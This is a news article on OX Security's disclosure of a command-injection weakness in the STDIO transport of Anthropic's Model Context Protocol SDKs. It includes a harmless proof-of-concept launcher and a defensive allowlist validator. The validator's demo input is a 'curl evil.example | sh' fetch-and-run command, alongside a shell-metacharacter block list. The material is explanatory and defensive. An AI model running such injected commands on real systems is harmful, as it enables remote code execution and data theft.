OX Security published research on April 15 disclosing what it calls a “critical, systemic” vulnerability in Anthropic’s Model Context Protocol, the open standard that connects AI agents to external tools and data sources. The flaw enables arbitrary command execution on any system running a vulnerable MCP implementation, potentially exposing sensitive data, API keys, internal databases, and chat histories to attackers.
The vulnerability is not a coding error. It is baked into Anthropic’s official MCP SDKs for Python, TypeScript, Java, and Rust, according to Infosecurity Magazine. Any developer building on the Anthropic MCP foundation inherits the exposure. OX Security estimates the blast radius at more than 200 open-source projects, over 150 million cumulative downloads, 7,000-plus publicly accessible servers, and up to 200,000 vulnerable instances.
The Exploit Mechanism
MCP’s STDIO transport was designed to launch a local server process from a configured command. But that command executes regardless of whether a valid server actually starts. “Pass in a malicious command, receive an error, and the command still runs,” OX Security explained in its advisory. No sanitization warnings. No red flags in the developer toolchain. The result: complete system takeover.
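The failure mode is easy to reproduce in miniature. The sketch below is illustrative only, not Anthropic’s SDK code; the launcher name and handshake details are hypothetical. It shows the pattern OX Security describes: the configured command is spawned first, and the client only discovers afterward that it is not a real MCP server. By then, any side effects of the command have already happened.

```python
import json
import os
import subprocess
import tempfile
from typing import Optional

# Hypothetical minimal STDIO-style launcher (illustrative, not Anthropic's
# actual SDK code): the configured command is spawned first, and only
# afterwards does the client learn whether it is a real server.
def launch_stdio_server(command: str, args: list) -> Optional[subprocess.Popen]:
    proc = subprocess.Popen(
        [command, *args],
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
    )
    try:
        # Attempt a JSON-RPC "initialize" handshake over stdin/stdout.
        proc.stdin.write(b'{"jsonrpc":"2.0","id":1,"method":"initialize"}\n')
        proc.stdin.flush()
        json.loads(proc.stdout.readline())
        return proc  # responded with JSON: treat as a live server
    except (OSError, json.JSONDecodeError):
        proc.kill()
        return None  # handshake failed, but the command already ran

marker = os.path.join(tempfile.gettempdir(), "mcp_injection_marker")
if os.path.exists(marker):
    os.remove(marker)

# A "server" entry pointing at an arbitrary command: a harmless stand-in
# for a malicious payload.
server = launch_stdio_server("sh", ["-c", f"touch {marker}"])
print("handshake succeeded:", server is not None)  # False: not a real server
print("payload executed:", os.path.exists(marker))  # True: side effect landed
```

The error the caller sees arrives only after the spawn, which is exactly the behavior the advisory summarizes: receive an error, and the command still runs.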
The Register reported that the research, which began in November 2025, identified four distinct attack vectors ranging from unauthenticated command injection to hardening bypass techniques that circumvent developer-implemented protections. OX Security successfully compromised 9 of 11 MCP marketplaces during testing. Vulnerable tools include Cursor, VS Code, Claude Code, Windsurf (CVE-2026-30615, zero-click exploitation), and Gemini-CLI. The team has issued over 30 responsible disclosures and discovered more than 10 high- or critical-severity CVEs across individual open-source implementations.
Anthropic’s Response
Anthropic declined to modify the protocol’s architecture. The company told OX Security that the STDIO execution model represents “expected behavior” and that input sanitization is the developer’s responsibility, according to both Infosecurity Magazine and The Register. A week after OX Security’s initial report, Anthropic quietly updated its security policy to note that STDIO adapters “should be used with caution.” OX Security’s assessment: “This change didn’t fix anything.” Anthropic did not respond to The Register’s inquiries for the story.
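With Anthropic placing sanitization on the integrator, the burden falls on each developer to vet commands before they are spawned. One defensive pattern, sketched below with hypothetical names and an assumed allowlist (none of this comes from Anthropic’s SDK), is to reject anything outside an explicit set of approved server binaries and screen arguments before any process launches:

```python
import shutil

# Hypothetical allowlist of approved MCP server binaries; this is one way
# a developer could harden STDIO launches, not an official mechanism.
ALLOWED_SERVERS = {"mcp-server-filesystem", "mcp-server-git"}
SHELL_METACHARACTERS = set(";|&$`><\n")

def vet_command(command: str, args: list) -> list:
    """Return an exec-ready argv, or raise before anything is spawned."""
    if command not in ALLOWED_SERVERS:
        raise ValueError(f"refusing unapproved server binary: {command!r}")
    resolved = shutil.which(command)
    if resolved is None:
        raise FileNotFoundError(f"approved server not installed: {command}")
    for arg in args:
        if SHELL_METACHARACTERS & set(arg):
            raise ValueError(f"suspicious argument rejected: {arg!r}")
    return [resolved, *args]  # pass to subprocess with shell=False

# An injection attempt is rejected before any process starts.
try:
    vet_command("sh", ["-c", "curl evil.example | sh"])
except ValueError as err:
    print("blocked:", err)
```

The essential property is that the check happens before the process is spawned: as the exploit mechanism shows, once the command runs, a failed handshake no longer helps.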
Kevin Curran, IEEE senior member and professor of cybersecurity at Ulster University, told Infosecurity Magazine the research exposed “a shocking gap in the security of foundational AI infrastructure.” He added: “If the very protocol meant to connect AI agents is this fragile and its creators will not fix it, then every company and developer building on top of it needs to treat this as an immediate wake-up call.”
The Supply Chain Risk
The core problem is architectural propagation. Because the flaw lives in the official SDKs, every downstream project built on Anthropic’s MCP code inherits the vulnerability, often without knowing it. OX Security argues that shifting the burden to developers, asking them to secure infrastructure the protocol itself fails to protect, is dangerous given the community’s track record on security. A root patch in the SDK, the firm says, could have cut risk across software packages totaling 150 million downloads and protected millions of downstream users at once. Instead, individual projects must now patch independently, one at a time.